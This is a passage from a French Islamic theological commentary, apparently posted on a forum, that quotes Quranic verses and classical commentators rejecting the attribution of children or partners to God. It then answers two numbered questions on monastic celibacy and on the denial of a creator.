    "Allah ne S'est point attribué d'enfant et il n'existe point de divinité avec Lui."
    Il dit dans la Sourate "Le Voyage Nocturne" - Verset 111:
    "Et dis: "Louange à Allah qui ne S'est jamais attribué d'enfant, qui n'a point d'associé en la royauté et qui n'a jamais eu de protecteur de l'humiliation."
    Et dans la Sourate "Le Discernement" - Versets 1 et 2:
    "Qu'on exalte la Bénédiction de Celui qui a fait descendre le Livre de Discernement sur Son serviteur, afin qu'il soit un avertisseur à l'univers.
    Celui à qui appartient la royauté des cieux et de la terre, qui ne S'est point attribué d'enfant, qui n'a point d'associé en Sa Royauté et qui a créé toute chose en lui donnant ses justes proportions."
    Dans la Sourate "Les Prophètes" - Versets 26 à 29:
    "Et ils disent: "Le Tout Miséricordieux s'est donné un enfant". Pureté à Lui! Mais ce sont plutôt des serviteurs honorés. Ils ne devancent pas Son Commandement et agissent selon Ses ordres.
    Il sait ce qui est devant eux et ce qui derrière eux. Et ils n'intercèdent qu'en faveur de ceux qu'il a agréés [tout en étant] pénétrés de Sa crainte.
    Et quiconque d'entre eux dirait: "Je suis une divinité en dehors de Lui". Nous le rétribuerons de l'Enfer. C'est ainsi que Nous rétribuons les injustes."
    Il a dit, pureté à Lui, dans la Sourate "Les Abeilles" - Versets 51 à 57:
    "Allah dit: "Ne prenez pas deux divinités. Il n'est qu'un Dieu unique. Donc, ne craignez que Moi". C'est à Lui qu'appartient ce qui est dans les cieux et sur la terre; c'est à Lui que l'obéissance perpétuelle est due."
    Jusqu’à Sa parole: "Et ils assignent une partie [des biens] que Nous leur avons attribués à (des idoles) qu'ils ne connaissent pas."
    Et à Sa parole:
    "Et ils assignent à Allah des filles. Gloire et pureté à Lui! Et à eux-mêmes, cependant, (ils assignent) ce qu'ils désirent (des fils)."
    Le Tout Haut a dit dans la Sourate "Le Voyage Nocturne" -Versets 39 à 42:
    "N'assigne donc pas à Allah d'autre divinité, sinon tu seras jeté dans l'Enfer, blâme et repoussé. Votre Seigneur, aurait-Il réservé exclusivement pour vous des fils, et Lui, aurait-Il pris pour Lui des filles parmi les Anges? Vous prononcez là une parole monstrueuse. Très certainement Nous avons exposé [tout ceci] dans ce Coran afin que [les gens] réfléchissent. Mais cela ne fait qu'augmenter leur répulsion.
    Dis: "S'il y avait des divinités avec Lui, comme ils le disent, elles auraient alors cherché un chemin [pour atteindre] le Détenteur du Trône."
    Et II a dit dans la Sourate "Les Rangés" - Versets 149 à 163:
    "Pose-leur donc la question: "Ton Seigneur aurait-Il des filles et eux des fils?
    Ou bien avons-Nous créé des Anges de sexe féminin, et en sont-ils témoins?".
    Certes, ils disent dans leur mensonge: "Allah a engendré"; mais ce sont certainement des menteurs! Aurait-Il choisi des filles de préférence à des fils?
    Qu'avez-vous donc à juger ainsi? Ne réfléchissez-vous donc pas? Ou avez-vous un argument évident? Apportez donc votre Livre si vous êtes véridiques!"
    Et ils ont établi entre Lui et les djinns une parenté, alors que les djinns savent  bien qu'ils [les mécréants] vont être emmenés (pour le châtiment).
    Gloire à Allah. Il est au-dessus de ce qu'ils décrivent! Exception faite des serviteurs élus d'Allah. En vérité, vous et tout ce que vous adorez,
    ne pourrez tenter [personne], excepté celui qui sera brûlé dans la Fournaise."
    Et II a dit dans la Sourate "L'Etoile" - Versets 19 à 27:
    "Que vous en semble [des divinités], Lat et Uzza, ainsi que Manat, cette troisième autre? Sera-ce à vous le garçon et à Lui la fille?
    Que voilà donc un partage injuste! Ce ne sont que des noms que vous avez inventés, vous et vos ancêtres. Allah n'a fait descendre aucune preuve à leur
    sujet. Ils ne suivent que la conjecture et les passions de [leurs] âmes, alors que la guidée leur est venue de leur Seigneur."
    Jusqu’à Sa parole:
    "Ceux qui ne croient pas en l'au-delà donnent aux Anges des noms de femmes."
    Le Très Haut a dit dans la Sourate "L'Ornement" - Verset 15:
    "Et ils Lui firent de Ses serviteurs une partie [de Lui-Même]."
    Certains commentateurs ont dit "une partie", c'est-à-dire: une part, un peu; d'autres ont dit: Ils ont assigné au Seigneur une part des enfants. D'après Qoutadah et Mouqatil cela veut dire: égalité; chacune des explications est juste. Vrai­ment, ils Lui assignent un fils, or le fils ressemble à son père. Pour cela. II a dit dans la Sourate "L’Ornement" - Verset 17:
    "Or, quand on annonce à l'un d'eux (la naissance) d'une semblable de ce qu'il attribue au Tout Miséricordieux, son visage s'assombrit d'un chagrin profond."
    C'est-à-dire: les filles, comme II l'a exprimé dans l'autre Verset 58 dans la Sourate "Les Abeilles":
    "Et lorsqu'on annonce à l'un d'eux une fille, son visage s'assombrit et une rage profonde [l'envahit]."
    Ils ont donc assigné un pareil au Très miséricordieux, et de Ses esclaves, une parcelle de Lui-même, car certes l'enfant est une partie de son père. Le Prophète (Saluts et bénédictions d'Allah sur lui) a dit: "Vraiment Fatimah est une partie de moi-même." Dans la Sourate "Les Bestiaux" - Verset 100, le Seigneur a dit:
    "Et ils ont désigné des associés à Allah: les djinns, alors que c'est Lui qui les a créés. Et ils Lui ont inventé, dans leur ignorance, des fils et des filles, Gloire à Lui!"
    Al-Kalbi a dit: Ce verset a été révélé au sujet des faux dévots qui disaient: "Certes le Seigneur et Satan sont deux associés: Allah est le créateur de la lumière, des gens et des animaux, Satan est le créateur de l'obscurité, des animaux féroces, des serpents et des scorpions."
    Quant à Sa parole:
    "Et ils ont établi entre Lui et les djinns une parenté."
    Ils s'agit de ce qu'ils disaient que les anges sont des filles de Dieu; et les anges sont dénommés "djinns" à cause de leur invisibilité, de l'avis de Moujahid et Qoutadah.
    On dit aussi qu'il s'agit d'une section d'anges appelés "djinns" dont Satan fait partie: ce sont les filles de Dieu.
    Al-Kalbi a ajouté: "Ils disaient, qu'ils soient maudits, que ce sont plutôt des graines d'où jaillissent des anges."
    Et Sa parole Tout Elevé: "Et ils Lui ont inventé, dans leur] ignorance, des fils et des filles.  Gloire à Lui."
    Certains! l'expliquent ainsi: II s'agit des mécréants d'entre les arabes qui disaient: les anges et les idoles sont les filles de Dieu. Les Juifs disaient: ‘Ouzayr est le fils de Dieu. Et ceux parmi les arabes, qui disaient que les anges étaient les filles de Dieu et ce qu'on rapporte d'eux que le Seigneur aurait une généalogie avec les djinns qui lui auraient enfanté les anges; le Seigneur a nié catégoriquement l'existence de cela, par l'abstention d'avoir une compagne, et de donner lieu à l'engendrement d'une part de Lui-même, pureté à Lui, car II est l'Absolu.
    Et l'expression: "Quand Il n'a pas de compagne" est énoncée pour signifier que l'enfantement n'a lieu qu'au moyen des deux ascendants, qu'il s'agisse de l'apparition de l'individu - dénommée aussi "l'essence" - ou de l'engendrement des signes et des caractères. On affirme qu'il n'y a engendrement des essences que par la séparation d'une partie du père mais si celui-ci s'abstient d'avoir une compagne il s'abstient égale­ment de s'attribuer un enfant. Or ils savaient déjà qu'Il n'avait pas de compagne ni parmi les anges ni parmi les djinns ni les humains. Personne ne disait qu'Il avait une compagne? Ceci est la preuve même qui infirme leur parole.
    Tout ce qu'on rapporte des mécréants parmi les arabes qu'Allah aurait une généalogie avec les djinns reste à prouver.
    Si cela avait été vraiment dit il serait à renier pour plusieurs raisons déjà citées. Il en est de même pour la parole des Nazaréens qui disaient que "le Messie était le fils de Dieu" et celle des Juifs qui prétendaient que "’’Ouzayr était le fils de Dieu."
    Tous ces dires ont été récusés par Allah, pureté à Lui. Le mot de la fin, à ce propos, se trouve dans le livre "La réponse adéquate à celui qui a altéré la religion du Messie" et dans l'explication de la Sourate "La Pureté" ainsi que dans d'autres ouvrages conçus par le Sheikh de l'Islam Taqiyouddine (Ibn Taymiyyah), que le Seigneur honore son âme de sainteté.
     
    Question n°31:
    L'exemption de l'être créé de ce qu'ils attribuaient au créateur
    Est le fait d'exempter la créature, quant à ce qu'ils avaient attribué au créateur, telle l'exemption de leurs moines du fait de s'assigner une épouse et des enfants. Car ils disaient: Ceux qui désirent accéder à la perfection comme les moines et leurs semblables doivent s'empêcher de se souiller par la jouissance avec les femmes, à l'exemple du Messie, paix sur lui.
    Il y a lieu de considérer ici la simplicité de leur pensée et ce vers quoi les conduisait leur égarement, au point de désap­prouver en son mariage notre maître et guide Muhammad (Saluts et bénédictions d'Allah sur lui). O combien sont beaux ces vers dits par Al Farouqi (II s'agit de 'Abdelbaki Al'Amri, un poète du 13ème siècle de l'Hégire) en guise de réponse à certains moines des Naza­réens:
    "Dis à celui qui veut imiter le modèle des moines: Toi qui prétends que le mariage est une imperfection pour celui que le Seigneur a préservé des défauts; aurais-tu oublié avoir affirmé" "le mariage du Seigneur à Marie?", aurais-tu oublié la prétention de chaque Nazaréen qui croit au triumvirat (le père, le fils et le saint-esprit)?"
    On sait aussi que certains parmi les arabes, bien qu'ils disaient que les anges étaient les filles du Seigneur, ils avaient honte d'en avoir et avaient institué leur enterrement vives pour s'en débarrasser. Ils attribuaient donc au Seigneur ce qu'ils détestaient eux-mêmes. Cela signifie que ces paroles et leurs semblables relèvent de l'ignorance totale de ce qu'ont apporté les apôtres et sont le témoignage d'un manque du sagesse, et de discernement, car les personnes clairvoyantes et averties ne se laissent guère envahir par de pareilles défaillances. Que le Seigneur nous fasse réussir!
     
    Question n°32:
    Leur non croyance à la création
    Est qu'ils prétendaient que ce monde n'avait pas de créateur, comme l'avaient dit Pharaon et les siens, lorsqu'il disait à son peuple ces paroles, rapportées dans la Sourate "Le Récit" -Verset 38:
    "Je ne connais pas de divinité pour vous, autre que moi," etc.
    Les stupidités blasphématoires pareilles existent à toute époque et les jeunes de ces temps-ci, dans leur majorité encore, ont cette conviction vaine. Pourtant, s'ils considèrent les choses objectivement et avec réflexion, ils sauront que tout être existant dans ce monde constitue le signe même qui révèle son créateur qui lui a permis de voir le jour.
    "Dans toute chose, il possède un signe qui indique qu'il est Un".
    Comment la nature peut-elle engendrer pareils détails qu'on trouve dans les cieux et dans les âmes, alors qu'elle est sans conscience, dépourvue des capacités du savoir et de la compréhension ? Allah s’élève au-dessus de ce qu’ils disent d’une très grande élévation.

      La date/heure actuelle est Jeu 23 Nov - 8:27